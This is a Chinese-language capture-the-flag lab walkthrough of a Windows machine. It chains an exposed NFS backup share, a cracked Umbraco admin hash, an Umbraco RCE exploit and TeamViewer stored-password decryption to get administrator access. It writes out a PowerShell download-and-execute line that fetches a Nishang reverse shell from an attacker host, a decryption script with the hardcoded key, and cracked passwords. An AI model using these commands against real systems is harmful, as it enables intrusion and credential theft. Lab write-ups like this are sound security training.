freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+TeamViewer权限提升
2024-08-26 13:33:58

信息收集

IP AddressOpening Ports
10.10.10.180TCP:21, 80, 111, 135, 139, 445, 2049, 5985, 47001, 49664, 49665, 49666, 49667, 49678, 49679, 49680

nmap -p- 10.10.10.180 --min-rate 1000 -sC -sV

PORT      STATE    SERVICE       VERSION
21/tcp    open     ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open     rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds?
2049/tcp  open     nlockmgr      1-4 (RPC #100021)
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
22975/tcp filtered unknown
47001/tcp open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open     msrpc         Microsoft Windows RPC
49665/tcp open     msrpc         Microsoft Windows RPC
49666/tcp open     msrpc         Microsoft Windows RPC
49667/tcp open     msrpc         Microsoft Windows RPC
49678/tcp open     msrpc         Microsoft Windows RPC
49679/tcp open     msrpc         Microsoft Windows RPC
49680/tcp open     msrpc         Microsoft Windows RPC
63748/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Umbraco && NFS

image.png

$ whatweb http://10.10.10.180/ -v

image-1.png

$ showmount -e 10.10.10.180

image-2.png

$ sudo mkdir -p /mnt/10.10.10.180

$ sudo mount -t nfs 10.10.10.180:/site_backups /mnt/10.10.10.180

image-3.png

$ strings App_Data/Umbraco.sdf | grep admin

image-4.png

username:adminadmin@htb.local
hash:b8be16afba8c314ad33d812f22a04991b90e2aaa

$ hashcat -m 100 b8be16afba8c314ad33d812f22a04991b90e2aaa /usr/share/wordlists/rockyou.txt --force

image-5.png

password:baconandcheese

登录

http://10.10.10.180/Umbraco#/login/false?returnPath=%252FUmbraco

image-6.png

image-7.png

image-8.png

https://www.exploit-db.com/exploits/46153

image-9.png

image-11.png

image-10.png

反向shell

https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

$ echo "Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.24 -Port 10032">>Invoke-PowerShellTcp.ps1

将powershell脚本上传目标

string cmd = "/c powershell -c iex(new-object net.webclient).downloadstring(\'http://10.10.16.24/Invoke-PowerShellTcp.ps1')";

$ python exp.py

image-12.png

User.txt

c9b78c488c6ae1828b13d050b156d542

权限提升

TeamViewer应用程序

image-13.png

在msf的插件中提及到Version7的注册表路径是HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version7

image-14.png

PS HKLM:\software\wow6432node\teamviewer\version7> get-itemproperty -path .

image-15.png

PS HKLM:\software\wow6432node\teamviewer\version7> (Get-ItemProperty -Path .).SecurityPasswordAES -join ", " | ForEach-Object { "[" + $_ + "]" }

image-16.png

image-17.png

#!/usr/bin/env python3

from Crypto.Cipher import AES

key = b"\x06\x02\x00\x00\x00\xa4\x00\x00\x52\x53\x41\x31\x00\x04\x00\x00"
iv = b"\x01\x00\x01\x00\x67\x24\x4F\x43\x6E\x67\x62\xF2\x5E\xA8\xD7\x04"
ciphertext = bytes([255, 155, 28, 115, 214, 107, 206, 49, 172, 65, 62, 174, 
                    19, 27, 70, 79, 88, 47, 108, 226, 209, 225, 243, 218, 
                    126, 141, 55, 107, 38, 57, 78, 91])

aes = AES.new(key, AES.MODE_CBC, IV=iv)
password = aes.decrypt(ciphertext).decode("utf-16").rstrip("\x00")

print(f"[+] Found password: {password}")

$ python dec.py

image-18.png

$ crackmapexec smb 10.10.10.180 -u administrator -p '!R3m0te!'

image-19.png

$ evil-winrm -u administrator -p '!R3m0te!' -i 10.10.10.180

image-20.png

Root.txt

858343dff7922d618a28508565307822

# web安全 # CTF
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录